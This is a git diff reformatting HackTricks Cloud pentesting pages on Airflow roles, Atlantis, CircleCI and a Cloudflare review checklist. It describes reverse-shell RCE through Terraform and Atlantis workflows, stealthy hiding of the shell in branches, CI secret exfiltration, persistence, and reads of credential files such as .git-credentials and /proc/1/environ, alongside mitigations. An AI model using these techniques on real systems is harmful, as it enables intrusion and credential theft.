on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs] -* **Op** +- **Op** \[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs] -* **User** +- **User** \[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances] -* **Viewer** +- **Viewer** \[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances] -* **Public** +- **Public** \[] -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/atlantis-security.md b/src/pentesting-ci-cd/atlantis-security.md similarity index 69% rename from pentesting-ci-cd/atlantis-security.md rename to src/pentesting-ci-cd/atlantis-security.md index a82b0d255..3143cd694 100644 --- a/pentesting-ci-cd/atlantis-security.md +++ b/src/pentesting-ci-cd/atlantis-security.md @@ -1,25 +1,12 @@ # Atlantis Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} ### Basic Information Atlantis basically helps you to to run terraform from Pull Requests from your git server. -![](<../.gitbook/assets/image (161).png>) +![](<../images/image (161).png>) ### Local Lab @@ -36,9 +23,8 @@ Atlantis basically helps you to to run terraform from Pull Requests from your gi However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\ [**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts. -{% hint style="warning" %} -In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**. -{% endhint %} +> [!WARNING] +> In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**. #### Webhooks @@ -48,9 +34,8 @@ One way to confirm this would be to **allowlist requests to only come from the I Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet. -{% hint style="warning" %} -Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**. -{% endhint %} +> [!WARNING] +> Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**. #### Provider Credentials @@ -60,17 +45,16 @@ Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** com It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis: -* The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs. -* If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex: - * [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role") - * [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) -* Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running. -* Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running. -* Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials. +- The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs. +- If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex: + - [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role") + - [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) +- Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running. +- Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running. +- Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials. -{% hint style="warning" %} -The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform. -{% endhint %} +> [!WARNING] +> The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform. #### Web Page @@ -82,8 +66,8 @@ You probably won't find it exposed to the internet, but it looks like by default Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three. -* You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server -* You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables) +- You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server +- You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables) Values are **chosen in this order**: @@ -91,9 +75,8 @@ Values are **chosen in this order**: 2. Environment Variables 3. Config File -{% hint style="warning" %} -Note that in the configuration you might find interesting values such as **tokens and passwords**. -{% endhint %} +> [!WARNING] +> Note that in the configuration you might find interesting values such as **tokens and passwords**. #### Repos Configuration @@ -121,36 +104,34 @@ There isn't any option to allow **specifying** these scripts in the **repo `/atl In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\ Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.** -{% hint style="danger" %} -If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\ -This will basically give **RCE in the Atlantis server to any user that can access that repo**. - -```yaml -# atlantis.yaml -version: 3 -projects: -- dir: . - workflow: custom1 -workflows: - custom1: - plan: - steps: - - init - - run: my custom plan command - apply: - steps: - - run: my custom apply command -``` -{% endhint %} +> [!CAUTION] +> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\ +> This will basically give **RCE in the Atlantis server to any user that can access that repo**. +> +> ```yaml +> # atlantis.yaml +> +> version: 3 +> projects: +> +> - dir: . +> workflow: custom1 +> workflows: +> custom1: +> plan: +> steps: - init - run: my custom plan command +> apply: +> steps: - run: my custom apply command +> ``` **Conftest Policy Checking** Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include: -* Denying usage of a list of modules -* Asserting attributes of a resource at creation time -* Catching unintentional resource deletions -* Preventing security risks (ie. exposing secure ports to the public) +- Denying usage of a list of modules +- Asserting attributes of a resource at creation time +- Catching unintentional resource deletions +- Preventing security risks (ie. exposing secure ports to the public) You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works). @@ -178,13 +159,13 @@ atlantis apply [options] -- [terraform apply flags] ## -w workspace ## --auto-merge-disabled ## --verbose -## You can also add extra terraform options +## You can also add extra terraform options ``` ### Attacks -{% hint style="warning" %} -If during the exploitation you find this **error**: `Error: Error acquiring the state lock` +> [!WARNING] +> If during the exploitation you find this **error**: `Error: Error acquiring the state lock` You can fix it by running: @@ -192,7 +173,6 @@ You can fix it by running: atlantis unlock #You might need to run this in a different PR atlantis plan -- -lock=false ``` -{% endhint %} #### Atlantis plan RCE - Config modification in new PR @@ -210,7 +190,7 @@ data "external" "example" { You can perform this attack even in a **stealthier way**, by following this suggestions: -* Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: +- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: ```javascript module "not_rev_shell" { @@ -218,10 +198,10 @@ module "not_rev_shell" { } ``` -You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) +You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) -* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` -* **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**. +- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` +- **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**. #### Atlantis plan Secrets Dump @@ -239,10 +219,10 @@ If you have write access over a repository you will be able to create a new bran However, you will usually need to bypass some protections: -* **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed). - * Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) -* **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply` - * By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) +- **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed). + - Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) +- **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply` + - By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ You just need to make sure some payload like the following ones ends in the `main.tf` file: @@ -284,28 +264,27 @@ Something you can pass are env variables which might be helpful to bypass some p Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\ This possibility was mentioned in a previous section: -{% hint style="danger" %} -If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used. - -This will basically give **RCE in the Atlantis server to any user that can access that repo**. - -```yaml -# atlantis.yaml -version: 3 -projects: -- dir: . - workflow: custom1 -workflows: - custom1: - plan: - steps: - - init - - run: my custom plan command - apply: - steps: - - run: my custom apply command -``` -{% endhint %} +> [!CAUTION] +> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used. +> +> This will basically give **RCE in the Atlantis server to any user that can access that repo**. +> +> ```yaml +> # atlantis.yaml +> version: 3 +> projects: +> - dir: . +> workflow: custom1 +> workflows: +> custom1: +> plan: +> steps: +> - init +> - run: my custom plan command +> apply: +> steps: +> - run: my custom apply command +> ``` #### Bypass plan/apply protections @@ -313,8 +292,8 @@ If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo ```yaml repos: -- id: /.*/ - apply_requirements: [] + - id: /.*/ + apply_requirements: [] ``` #### PR Hijacking @@ -325,7 +304,7 @@ Moreover, if you don't have configured in the **branch protection** to ask to ** This is the **setting** in Github branch protections: -![](<../.gitbook/assets/image (216).png>) +![](<../images/image (216).png>) #### Webhook Secret @@ -335,20 +314,20 @@ If you manage to **steal the webhook secret** used or if there **isn't any webho Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs. -* This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket. -* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos. -* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses). +- This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket. +- If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos. +- To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses). ### Post-Exploitation If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read: -* `/home/atlantis/.git-credentials` Contains vcs access credentials -* `/atlantis-data/atlantis.db` Contains vcs access credentials with more info -* `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file - * Example: /atlantis-data/repos/ghOrg\_/\_myRepo/20/default/env/prod/.terraform/terraform.tfstate -* `/proc/1/environ` Env variables -* `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data) +- `/home/atlantis/.git-credentials` Contains vcs access credentials +- `/atlantis-data/atlantis.db` Contains vcs access credentials with more info +- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file + - Example: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate +- `/proc/1/environ` Env variables +- `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data) ### Mitigations @@ -364,10 +343,10 @@ If you're running on a public repo (which isn't recommended, see above) you shou Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example: -* Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` -* Your whole organization: `--repo-allowlist=github.com/runatlantis/*` -* Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*` -* All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret. +- Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` +- Your whole organization: `--repo-allowlist=github.com/runatlantis/*` +- Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*` +- All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret. This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details. @@ -403,20 +382,7 @@ You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` ### References -* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs) -* [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html) +- [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs) +- [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/circleci-security.md b/src/pentesting-ci-cd/circleci-security.md similarity index 59% rename from pentesting-ci-cd/circleci-security.md rename to src/pentesting-ci-cd/circleci-security.md index e92fede51..4d9e161f1 100644 --- a/pentesting-ci-cd/circleci-security.md +++ b/src/pentesting-ci-cd/circleci-security.md @@ -1,19 +1,6 @@ # CircleCI Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} ### Basic Information @@ -42,8 +29,8 @@ You can declare them in clear text inside a **command**: - run: name: "set and echo" command: | - SECRET="A secret" - echo $SECRET + SECRET="A secret" + echo $SECRET ``` You can declare them in clear text inside the **run environment**: @@ -53,18 +40,18 @@ You can declare them in clear text inside the **run environment**: name: "set and echo" command: echo $SECRET environment: - SECRET: A secret + SECRET: A secret ``` You can declare them in clear text inside the **build-job environment**: ```yaml jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret + build-job: + docker: + - image: cimg/base:2020.01 + environment: + SECRET: A secret ``` You can declare them in clear text inside the **environment of a container**: @@ -81,24 +68,22 @@ jobs: #### Project Secrets These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\ -You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ +You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ -![](<../.gitbook/assets/image (129).png>) +![](<../images/image (129).png>) -{% hint style="danger" %} -The "**Import Variables**" functionality allows to **import variables from other projects** to this one. -{% endhint %} +> [!CAUTION] +> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. #### Context Secrets These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here: -![](<../.gitbook/assets/image (123).png>) +![](<../images/image (123).png>) -{% hint style="success" %} -However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\ -This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people. -{% endhint %} +> [!TIP] +> However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\ +> This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people. ### Attacks @@ -108,17 +93,15 @@ If you have **access to the VCS** (like github) check the file `.circleci/config #### Secret Env Vars & Context enumeration -Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_. +Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_. #### Exfiltrate Project secrets -{% hint style="warning" %} -In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_). -{% endhint %} +> [!WARNING] +> In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_). -{% hint style="danger" %} -The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**. -{% endhint %} +> [!CAUTION] +> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**. All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**: @@ -224,9 +207,8 @@ workflows: context: Test-Context ``` -{% hint style="warning" %} -Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**. -{% endhint %} +> [!WARNING] +> Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**. #### Escape to Cloud @@ -259,28 +241,15 @@ jobs: #### Persistence -* It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access. - * _https://app.circleci.com/settings/user/tokens_ -* It's possible to **create projects tokens** to access the project with the permissions given to the token. - * _https://app.circleci.com/settings/project/github/\/\/api_ -* It's possible to **add SSH keys** to the projects. - * _https://app.circleci.com/settings/project/github/\/\/ssh_ -* It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday. - * Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday. -* If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor** -* You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value +- It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access. + - _https://app.circleci.com/settings/user/tokens_ +- It's possible to **create projects tokens** to access the project with the permissions given to the token. + - _https://app.circleci.com/settings/project/github/\/\/api_ +- It's possible to **add SSH keys** to the projects. + - _https://app.circleci.com/settings/project/github/\/\/ssh_ +- It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday. + - Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday. +- If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor** +- You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/cloudflare-security/README.md b/src/pentesting-ci-cd/cloudflare-security/README.md new file mode 100644 index 000000000..e4e65d7dd --- /dev/null +++ b/src/pentesting-ci-cd/cloudflare-security/README.md @@ -0,0 +1,134 @@ +# Cloudflare Security + +{{#include ../../banners/hacktricks-training.md}} + +In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** + +
+ +## Websites + +Review each with: + +{{#ref}} +cloudflare-domains.md +{{#endref}} + +### Domain Registration + +- [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain. + +Review each with: + +{{#ref}} +cloudflare-domains.md +{{#endref}} + +## Analytics + +_I couldn't find anything to check for a config security review._ + +## Pages + +On each Cloudflare's page: + +- [ ] Check for **sensitive information** in the **`Build log`**. +- [ ] Check for **sensitive information** in the **Github repository** assigned to the pages. +- [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/). +- [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any). +- [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code** +- [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**. +- [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page. + +## **Workers** + +On each Cloudflare's worker check: + +- [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker? +- [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information** +- [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input) + - Check for SSRFs returning the indicated page that you can control + - Check XSSs executing JS inside a svg image + - It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input. + +> [!WARNING] +> Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it. + +## R2 + +On each R2 bucket check: + +- [ ] Configure **CORS Policy**. + +## Stream + +TODO + +## Images + +TODO + +## Security Center + +- [ ] If possible, run a **`Security Insights`** **scan** and an 